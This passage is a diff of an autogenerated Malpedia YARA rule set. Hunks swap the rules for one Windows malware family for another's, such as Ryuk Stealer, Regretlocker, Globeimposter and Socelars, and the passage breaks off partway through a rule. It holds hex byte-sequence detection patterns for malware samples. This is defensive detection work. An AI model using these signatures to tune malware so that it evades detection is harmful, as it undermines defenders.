-		7 of them and filesize < 204800
+		7 of them and filesize < 1416192
 }
-rule MALPEDIA_Win_Duuzer_Auto : FILE
+rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9aa8686-ae5c-522f-84d5-1ffe739b66d7"
+		id = "28c4a97d-0c23-5f05-a50b-7fc331a8ef51"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.duuzer_auto.yar#L1-L148"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ryuk_stealer_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "0a972badbc054d0ce47d3497dce1a043373ba372ad2c5fee4eff7c656c3de915"
+		logic_hash = "f104c51f76af6a34fecb95d90a97bc0fef4b38e853341fac8b68ac59b1274295"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139532,37 +140103,32 @@ rule MALPEDIA_Win_Duuzer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f804 7408 83c8ff e9???????? }
-		$sequence_1 = { 44899d20230000 e8???????? 33c0 488d8dce0f0000 }
-		$sequence_2 = { 40 8985b0cbffff 3bc3 0f8c55fcffff b808000000 }
-		$sequence_3 = { 488bcb c744242801000000 c744242003000000 ff15???????? 4c8be0 }
-		$sequence_4 = { c78524f4ffff5ae5bef3 c78528f4ffff83f7223e c7852cf4ffff8498990b c78530f4ffffc41f6f89 }
-		$sequence_5 = { 66f3a7 7554 488b0d???????? 488d542420 41b8c0200000 }
-		$sequence_6 = { 6800040000 52 e8???????? 8d85f8f7ffff 6a5c }
-		$sequence_7 = { 8988180b0000 8d887c0a0000 8988300b0000 33c9 c780200b0000907f4200 }
-		$sequence_8 = { c785b8feffff47484e4c c785bcfeffff5b7e2929 c785c0feffff295e5a1b c785c4feffff761a1b07 c785c8feffff6d656529 }
-		$sequence_9 = { c3 53 8b1d???????? 33c9 bf???????? }
-		$sequence_10 = { 488b8ba0000000 488d051b450100 483bc8 7405 e8???????? }
-		$sequence_11 = { ff15???????? 85db 7e43 488b1d???????? }
-		$sequence_12 = { 8d8d843effff 51 52 e8???????? }
-		$sequence_13 = { 41b902000000 4533c0 488bcb e8???????? }
-		$sequence_14 = { 48895c2468 498bd4 4c897c2420 48397e20 7408 }
+		$sequence_0 = { ff15???????? 8bf0 ff15???????? 85c0 7518 85f6 7414 }
+		$sequence_1 = { 8bcb 0f44f2 42 8d7902 }
+		$sequence_2 = { 83ff01 755d 8bcb e8???????? }
+		$sequence_3 = { f7f9 81c2a8610000 52 ff15???????? }
+		$sequence_4 = { 99 b9a0860100 f7f9 81c2a8610000 52 }
+		$sequence_5 = { f7f1 8bf2 e8???????? 8bc8 33d2 8bc6 f7f1 }
+		$sequence_6 = { c1e902 f3a5 8bca 83e103 f3a4 6a64 8d44245c }
+		$sequence_7 = { 8a443701 3c2f 7408 3c2d }
+		$sequence_8 = { ff15???????? 83f805 740a b9???????? }
+		$sequence_9 = { 8d45e0 50 8d85b4fdffff 50 }
 
 	condition:
-		7 of them and filesize < 491520
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Newsreels_Auto : FILE
+rule MALPEDIA_Win_Flusihoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "596de4f5-9368-5129-8f10-46a814b9edc2"
+		id = "8d409317-c933-58d0-aa63-14cb54e47b7c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newsreels_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flusihoc_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "31294f0bc1fd72fff816bb0c2c17d33dbab780b957e5c41520b825232208a7ae"
+		logic_hash = "410a07cce1b358109f5858d6a241fb0d56be6d17f2ab80d7283dacba4edb86ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139576,32 +140142,38 @@ rule MALPEDIA_Win_Newsreels_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895144 8bc2 8a542404 88540848 8b4144 }
-		$sequence_1 = { 33c0 5b 81c40c050000 c3 8d4c2418 51 6804010000 }
-		$sequence_2 = { c6043000 5e 5d 5b 81c4a0010000 c3 }
-		$sequence_3 = { 8d542428 52 89442430 e8???????? 8d442474 }
-		$sequence_4 = { 53 e8???????? 83c414 3bf5 75a4 }
-		$sequence_5 = { 8d7048 8ad1 57 8b7804 8816 8b5010 41 }
-		$sequence_6 = { 3d???????? 8a143a 88540c07 7cec b910000000 }
-		$sequence_7 = { ffd6 85c0 0f84c1000000 8b3d???????? 53 8d442424 }
-		$sequence_8 = { 8b742410 33c0 8ada 8ac8 }
-		$sequence_9 = { 56 8bf1 8b4e18 8b5614 }
+		$sequence_0 = { a1???????? 33c4 89842450160000 53 56 8b7508 57 }
+		$sequence_1 = { f3a5 c684246402000000 e8???????? 68d6000000 }
+		$sequence_2 = { 8d4de8 3c7c 740f 3c0a }
+		$sequence_3 = { 52 ffd6 6a0a ff15???????? }
+		$sequence_4 = { 8bec 83e4f8 b854160000 e8???????? a1???????? 33c4 }
+		$sequence_5 = { 8d7c2428 50 f3a5 c684246402000000 }
+		$sequence_6 = { 6a00 50 c744242c44000000 e8???????? }
+		$sequence_7 = { ffd3 8b442410 6aff 50 ff15???????? 8b4c2410 51 }
+		$sequence_8 = { 83f822 7506 fe8e42010000 3d14010000 7506 fe8633010000 }
+		$sequence_9 = { 57 6a40 8d442428 6a00 }
+		$sequence_10 = { f3a5 c684246401000000 e8???????? 83c40c }
+		$sequence_11 = { 83f828 7507 80864d01000004 83f822 7506 }
+		$sequence_12 = { ff15???????? 8b4c2410 51 ffd6 8b542414 52 ffd6 }
+		$sequence_13 = { 8d8df8feffff 51 6a00 ff15???????? 8d95f4feffff 52 6806000200 }
+		$sequence_14 = { 6806000200 6a00 68???????? 6802000080 ff15???????? 85c0 752f }
+		$sequence_15 = { 85c0 752f 8b8df4feffff 6804010000 8d85f8feffff 50 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Biscuit_Auto : FILE
+rule MALPEDIA_Win_Pkybot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66751c6c-b859-5182-9d1d-e9646223d6c4"
+		id = "9566564a-6687-550f-9183-0e62d1076054"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.biscuit_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pkybot_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "84aba44ada1e956d4a74e202350a88ae7df3ab1612a23de6af2ad0ed5a1e2805"
+		logic_hash = "a42386b2108c9d1af3a399f3ab6d599f676b5aeb865fae8577e3f6311e115c33"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139615,32 +140187,32 @@ rule MALPEDIA_Win_Biscuit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89542420 8b542410 6a00 51 6a00 52 }
-		$sequence_1 = { 50 ff15???????? 8b35???????? 8d4c240c 51 68???????? 6a00 }
-		$sequence_2 = { ffd6 8b4304 8d55ec 6a04 52 6a02 50 }
-		$sequence_3 = { 2b9584feffff 899598feffff 8b858cfeffff 3b8598feffff 0f87d4000000 8b8d8cfeffff }
-		$sequence_4 = { 8b8d1cb7ffff bf???????? 8bb524b7ffff 33d2 899544b6ffff }
-		$sequence_5 = { 83fefd 897508 7605 e8???????? 8b4b04 33d2 3bca }
-		$sequence_6 = { ff15???????? 6a64 ff15???????? e9???????? 5f 5e }
-		$sequence_7 = { 85f6 7533 fec8 56 8841ff 8bcb e8???????? }
-		$sequence_8 = { 8b9530daffff 83c9ff 33c0 f2ae f7d1 2bf9 8bf7 }
-		$sequence_9 = { a1???????? 50 6a00 8b8d30b8ffff 51 }
+		$sequence_0 = { 83c40c 8d45fc 50 56 ff7510 ff750c }
+		$sequence_1 = { 85c0 7510 8b4e04 21413c c741300c000000 897938 5f }
+		$sequence_2 = { 894604 e8???????? 6a04 50 }
+		$sequence_3 = { 56 ff7518 57 ff15???????? 56 ff7514 ff7510 }
+		$sequence_4 = { 84c0 750e 8b7624 85f6 }
+		$sequence_5 = { ff15???????? 8bf0 ff15???????? 85c0 7509 85f6 }
+		$sequence_6 = { e8???????? 8d8e90000000 e8???????? 8d4e44 e8???????? 8bce }
+		$sequence_7 = { ff15???????? 8b45f0 0b45f4 741b 8b45f8 0b45fc }
+		$sequence_8 = { 7512 ff15???????? a3???????? 03c0 }
+		$sequence_9 = { ff7510 ff750c 57 ff7508 e8???????? 57 8bd8 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Acronym_Auto : FILE
+rule MALPEDIA_Win_Regretlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c38cb44e-5275-529c-849b-aac482405c26"
+		id = "a9ec355a-0ebd-5eae-9855-3c394e286080"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acronym_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.regretlocker_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "62c9feab89deca514303e2d96ba97df762d7107dad9f170f73597a4727ca0781"
+		logic_hash = "f3fb26e7f48e7fc6e56408b23120104bca26438c533527ef9b1632b5882b6ef9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139654,32 +140226,32 @@ rule MALPEDIA_Win_Acronym_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4da4 8b5508 8b8578ffffff 89048a 8b4d9c 83c101 894d9c }
-		$sequence_1 = { 8b4dfc 8b4904 e8???????? 8b55f4 8955d0 8b45d0 }
-		$sequence_2 = { 8bb540e5ffff e9???????? 8bb540e5ffff e9???????? 8b8530e5ffff 8b048590174300 f644060480 }
-		$sequence_3 = { 754f 8b0d???????? e8???????? 85c0 753a 33c9 75fc }
-		$sequence_4 = { 0fb754415e 8b45ec 69c008040000 8b4d08 8d840160b10000 8b0c90 }
-		$sequence_5 = { 8945f8 33d2 75fc 837df800 0f8cd6020000 33c0 75fc }
-		$sequence_6 = { 8b45fc 894220 8b4d08 c7410800000000 8b5508 c7420c00000000 8b4508 }
-		$sequence_7 = { 8b45b0 894415d0 b904000000 6bc900 }
-		$sequence_8 = { c1e306 8b048590174300 0fbe441804 83e001 7470 57 }
-		$sequence_9 = { 50 8b4d08 83c108 51 8b0d???????? e8???????? 8b08 }
+		$sequence_0 = { e8???????? 8bc7 8d8dbcfeffff 2b45e8 53 50 }
+		$sequence_1 = { e8???????? 50 c645fc0d e8???????? 83c410 8d8d50ffffff e8???????? }
+		$sequence_2 = { e9???????? 8d4701 50 e8???????? 8bf0 33c0 57 }
+		$sequence_3 = { 8b4704 83c40c 8bde 3bf0 7418 6a6c 8bf8 }
+		$sequence_4 = { 50 e8???????? c745ec03000000 8b4d18 8d45f3 50 8d45d4 }
+		$sequence_5 = { 66394604 7505 8d4606 eb3f 6a5c 5a 83ff03 }
+		$sequence_6 = { 6a40 ff7508 8b7850 8b7054 8b5858 8945fc 8d45b0 }
+		$sequence_7 = { 8945e0 8d0c38 8d4118 895110 894508 895114 e8???????? }
+		$sequence_8 = { 84c0 75f9 ff7510 2bce 51 52 ff7508 }
+		$sequence_9 = { 8b5508 56 8bf1 8b02 894610 8b4224 894614 }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 1021952
 }
-rule MALPEDIA_Win_Miragefox_Auto : FILE
+rule MALPEDIA_Win_Icondown_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8bf05d8f-c582-5717-9f26-33fdbc027523"
+		id = "5373046f-833e-5b65-887b-89e409444e78"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miragefox_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.icondown_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "fae00ba596fafa75e5c73049938b7e9042d943cf7a2a8e03f73ab30fb5fff604"
+		logic_hash = "bd300aef1bbb9e18b32c6db589be33a644549d928eba04fbddb21d95cf446793"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139693,32 +140265,32 @@ rule MALPEDIA_Win_Miragefox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 83c424 8d85f877ffff b9???????? 8975fc }
-		$sequence_1 = { ffd6 ff750c 8bf0 57 }
-		$sequence_2 = { 68???????? 50 e8???????? 8bf8 33db 59 3bfb }
-		$sequence_3 = { 89b5087cffff 50 e8???????? 03bd187cffff e9???????? }
-		$sequence_4 = { c1f905 83e01f 8b0c8d20f52a00 8d04c0 f644810401 741d }
-		$sequence_5 = { 33c0 85db 7e08 000438 40 }
-		$sequence_6 = { 8945e8 53 8d85a873ffff 56 50 e8???????? 53 }
-		$sequence_7 = { 8b45f0 6808880000 2b45ec 53 }
-		$sequence_8 = { 83f8ff 8945fc 0f84e1000000 bf14410000 8d85d4beffff 57 53 }
-		$sequence_9 = { 2900 55 8bec 81ec48030000 53 }
+		$sequence_0 = { c7861401000001000000 e8???????? 8bf0 395e58 c74654df614300 7531 }
+		$sequence_1 = { b97f000000 33c0 8dbc246d010000 889c246c010000 f3ab 66ab aa }
+		$sequence_2 = { ff15???????? 8b442404 6a01 8b4c240c 83ec10 8bd4 }
+		$sequence_3 = { 7403 8b4004 50 6a00 6803130000 51 ff15???????? }
+		$sequence_4 = { 3bd1 7f3f 8b542410 8a0a 8a5a01 3acb 7732 }
+		$sequence_5 = { 68???????? ff15???????? 392d???????? 7e6f 8d04ad00000000 399c80641e4500 8d3480 }
+		$sequence_6 = { ff2485bc2f4000 56 8d44246c 55 50 e8???????? 83c40c }
+		$sequence_7 = { 896c2420 896c2424 894c242c ff15???????? 8b5c2430 8b4c2428 }
+		$sequence_8 = { 50 ff74240c e8???????? c3 b8???????? c3 }
+		$sequence_9 = { 8a4e24 f6c101 7409 8b4e1c 85c9 7408 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 5505024
 }
-rule MALPEDIA_Win_Combos_Auto : FILE
+rule MALPEDIA_Win_Aurora_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83be0118-da53-5a8d-831d-9e770a5f717d"
+		id = "db71bfec-d16f-5b65-a2de-3646c8fc9579"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.combos_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aurora_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "f3e6fe545b99111283539f520a90d4bf3b968444eac10c20521004e7b16afe6f"
+		logic_hash = "59e6b8275e1925f874147250deaf1189e73e34e27743f50bcfcc60f5d60b4760"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139732,32 +140304,32 @@ rule MALPEDIA_Win_Combos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd8 899dd8feffff 3bdf 0f84a2000000 8b7d0c 83c9ff }
-		$sequence_1 = { 83e33f 33d3 c1f804 8b9c9600030000 8a51ff 0bfb }
-		$sequence_2 = { c1f805 8d1c85201b0110 8b4508 83e01f 8d34c0 }
-		$sequence_3 = { 53 56 8b8dd8feffff 51 57 68ffff1f00 }
-		$sequence_4 = { 85db 750b 8d4eff 3bf9 8b4c2410 }
-		$sequence_5 = { ff15???????? 8bd0 8995d8feffff 3bd3 0f847d010000 }
-		$sequence_6 = { 48 8bf0 c1f803 83e607 0fbe0410 8504b548930010 0f95c0 }
-		$sequence_7 = { 8b0c8d201b0110 8d04c0 f644810401 7425 57 56 e8???????? }
-		$sequence_8 = { 50 56 e8???????? 8945d0 8b7d08 }
-		$sequence_9 = { 8bd0 2be8 89542414 eb04 8b542414 33c0 }
+		$sequence_0 = { 51 8d4de4 c745d801000000 c745e0ffffffff }
+		$sequence_1 = { 8855cc 33f6 8a55d2 8aca }
+		$sequence_2 = { 8d8dd4efffff c785e8efffff0f000000 c785e4efffff00000000 c685d4efffff00 e8???????? }
+		$sequence_3 = { 85c0 0f850affffff 85db 0f849b000000 8bc3 83fb04 }
+		$sequence_4 = { 6a02 68???????? 8d8de4eeffff c785f8eeffff0f000000 c785f4eeffff00000000 c685e4eeffff00 e8???????? }
+		$sequence_5 = { 68???????? 8d8de4f1ffff c785f8f1ffff0f000000 c785f4f1ffff00000000 c685e4f1ffff00 e8???????? }
+		$sequence_6 = { c78550f1ffff0f000000 c7854cf1ffff00000000 c6853cf1ffff00 e8???????? 8d8d54f1ffff }
+		$sequence_7 = { e8???????? 6a04 68???????? 8d8d44efffff c78558efffff0f000000 c78554efffff00000000 c68544efffff00 }
+		$sequence_8 = { e8???????? 8bd0 c745d407000000 33c0 c745d000000000 83c404 668945c0 }
+		$sequence_9 = { 8b06 8b4804 8b44310c 85c0 0f9445f0 c745fc01000000 a806 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Unidentified_078_Auto : FILE
+rule MALPEDIA_Win_Greetingghoul_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64f36470-7870-5fa2-9ea9-c0ec36ad9821"
+		id = "881721a5-e164-51b8-a287-1242b24b8d86"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_078_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.greetingghoul_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "b2ccb25b85c44f5791ffc176375cf264c69c00ab695680a03b0c62f11e1990f7"
+		logic_hash = "21010fe53cfb0bf5a0ef36b612c93204fe24237a4c71d13df9cbc88f88795750"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139771,32 +140343,32 @@ rule MALPEDIA_Win_Unidentified_078_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fb11 743f 81fba2000000 7437 89da 83e2fd }
-		$sequence_1 = { 83fa15 760e 83eb5b 83fb01 0f8720010000 eb0f b901003b00 }
-		$sequence_2 = { e8???????? ebcb 56 53 }
-		$sequence_3 = { 80fa0c 0f8412010000 0f8cee000000 80fa0d 0f8421010000 80fa1b }
-		$sequence_4 = { 741b 80fa18 7431 eb6b }
-		$sequence_5 = { 7e2b 8a44010f 3c5c 7423 3c2f 741f }
-		$sequence_6 = { 7404 ffd0 ebc9 ffd0 }
-		$sequence_7 = { 80fa5c 0f84cb000000 80fa7e 0f8f02010000 e9???????? ba02000000 e8???????? }
-		$sequence_8 = { 7514 8a542e10 80fa5c 0f94c1 }
-		$sequence_9 = { 7437 89da 83e2fd 83fa10 }
+		$sequence_0 = { 7405 80fa09 7503 47 ebec 8d4ad0 80f909 }
+		$sequence_1 = { 03f1 eb03 83ceff 8a17 84d2 }
+		$sequence_2 = { 2bc8 7409 8b7df8 4e 43 }
+		$sequence_3 = { 6a01 e8???????? 83c404 85c0 7e02 ff06 }
+		$sequence_4 = { eba7 5f 5e 83c8ff 5b }
+		$sequence_5 = { 750a 83c002 66833c0200 75e8 66833800 }
+		$sequence_6 = { 741b 83ea01 75e8 eb14 0fbe45ff }
+		$sequence_7 = { bb10000000 eb3c 80f909 7708 0fbec2 }
+		$sequence_8 = { 85c0 7405 83f8ff 7508 85ff }
+		$sequence_9 = { 8a08 3acb 750c 40 84c9 }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 696320
 }
-rule MALPEDIA_Win_Ice_Ix_Auto : FILE
+rule MALPEDIA_Win_Socelars_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3971da01-8501-5ba0-8d5a-dc36a272dee6"
+		id = "392a881e-8204-5538-905a-79f8339a81a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ice_ix_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.socelars_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "297f8752913927ba432b9de91965d7e2bc2305cd2fc61a756292f8224e68d59e"
+		logic_hash = "b8094e8a90fbd4b228aeee4fe07a815ac53358ef07b587d100a6e2f0f5e01dbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139810,32 +140382,32 @@ rule MALPEDIA_Win_Ice_Ix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 897c2414 6a78 8d74243c 58 e8???????? 8b44240c 8b08 }
-		$sequence_1 = { 7564 6a62 8db550ffffff 58 }
-		$sequence_2 = { 8d75dc b893000000 e8???????? 8d45fc }
-		$sequence_3 = { f645f404 7433 6a4a 8d75cc }
-		$sequence_4 = { 6a00 8d45f4 50 e8???????? 8db5d8feffff b89b000000 }
-		$sequence_5 = { 6836084923 e8???????? 8945e8 85c0 7506 40 e9???????? }
-		$sequence_6 = { 56 ff5008 8b7df8 68cc000000 6a36 58 e8???????? }
-		$sequence_7 = { 7641 8d1438 8a0a 80f926 7505 }
-		$sequence_8 = { e8???????? 6a0a 8d7c2438 58 e8???????? 8b4508 8b00 }
-		$sequence_9 = { eb04 897c241c 6a77 8d742454 }
+		$sequence_0 = { f20f11542460 81ff5e010000 7e32 8a4c2415 8dbc24d0000000 33c0 888c24d0000000 }
+		$sequence_1 = { 8bec 56 8b7508 8b4608 85c0 7410 fe8850814f00 }
+		$sequence_2 = { f7d1 0b4db0 334dac ba04000000 6bc20d 034c05bc 8b55b4 }
+		$sequence_3 = { 8b4508 40 8939 ff463c 894638 8b5324 8b09 }
+		$sequence_4 = { e8???????? 807f4900 0f8583030000 837e5c00 750a 837e4c00 0f8473030000 }
+		$sequence_5 = { eb09 83f9ff 0f84eb040000 8b4e08 8b460c 234f20 234724 }
+		$sequence_6 = { eb05 e8???????? 8bf0 83c408 85f6 740d ff7508 }
+		$sequence_7 = { e8???????? 8945a8 8b45e8 50 8b4de0 e8???????? 8945a4 }
+		$sequence_8 = { e8???????? c645fc02 c685fbf8ffff00 68???????? 68???????? e8???????? 83c408 }
+		$sequence_9 = { 8bcb e8???????? 8bf0 83fe11 0f85cf000000 8b7c241c e9???????? }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 2151424
 }
-rule MALPEDIA_Win_Crytox_Auto : FILE
+rule MALPEDIA_Win_Oddjob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cfd8bc3e-6e83-548e-8e5a-491fd708c53c"
+		id = "32aa97fe-459e-54bb-b312-8c16abdd023e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crytox_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oddjob_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "0d608432c61d44fbe73904a491bbca98a3f6f38166b8de3be56cb8c75f376d55"
+		logic_hash = "c90a8570c9226524a00ad8a64dc22040d6bcfc4b7b8994bff5525418a1842496"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139849,32 +140421,32 @@ rule MALPEDIA_Win_Crytox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f8483000000 c744240402a00000 891c24 e8???????? 895c2430 }
-		$sequence_1 = { c1ff1f 31f8 29f8 8d3402 0fb601 0fb613 29c2 }
-		$sequence_2 = { d90481 8b442460 c744240801000000 d9ee 890424 dfe9 ddd8 }
-		$sequence_3 = { f7d0 31f6 c1e206 01d0 80bd7ffeffff00 7419 8bb5f8feffff }
-		$sequence_4 = { e8???????? 8b4c2440 3c3f 880419 76e4 8b15???????? c644242c01 }
-		$sequence_5 = { c5fd7f9c2440060000 c5fd7fac24a0050000 c5c5fe9c2460050000 c5c5feec c5fd7f9c2480050000 c5c5fe942400050000 c5c5fea42440070000 }
-		$sequence_6 = { e8???????? 0fb68520faffff 8844242c 83e07f 3c02 0f84c9020000 8b8528faffff }
-		$sequence_7 = { e9???????? 0fb68fe06f6900 89d8 29c8 d3e7 d3e2 89854c3d0000 }
-		$sequence_8 = { d905???????? d94508 d9c9 dfe9 ddd8 7207 b80080ffff }
-		$sequence_9 = { e9???????? 8b4508 8b4044 8b55c8 c1e202 01d0 8b00 }
+		$sequence_0 = { 8845da 8845df 8845fa 8845fb 8b4508 6a40 052a080000 }
+		$sequence_1 = { 8b450c 85c0 74f2 8365f800 85ff 7677 8945f4 }
+		$sequence_2 = { c685c1f8ffff68 c685c2f8ffff8e c685c3f8ffff4e c685c4f8ffff0e c685c5f8ffffec 8885c6f8ffff c685c7f8ffffb5 }
+		$sequence_3 = { c68530feffffc2 c68531feffff04 889d32feffff c68533feffff83 c68534feffffc4 }
+		$sequence_4 = { e8???????? 89858494ffff 3bc3 7506 899da494ffff 6a08 }
+		$sequence_5 = { 3bcf 8955fc 7ce0 33c9 394d0c 762b }
+		$sequence_6 = { 0bc6 0fb67102 0fb64903 c1e008 33f2 0bc6 33ca }
+		$sequence_7 = { 885e1a c785b0feffff01000000 885e10 8b4dfc 8b85b0feffff 5f 33cd }
+		$sequence_8 = { 50 ff5108 3bfe 7405 }
+		$sequence_9 = { e8???????? ff75f0 d1eb 53 57 }
 
 	condition:
-		7 of them and filesize < 6156288
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Virdetdoor_Auto : FILE
+rule MALPEDIA_Win_Globeimposter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e6bed26-b841-5f32-a122-ab8bbf6a241f"
+		id = "9dd6e8ba-63ad-5aaa-964a-871b7e1e06e1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor"
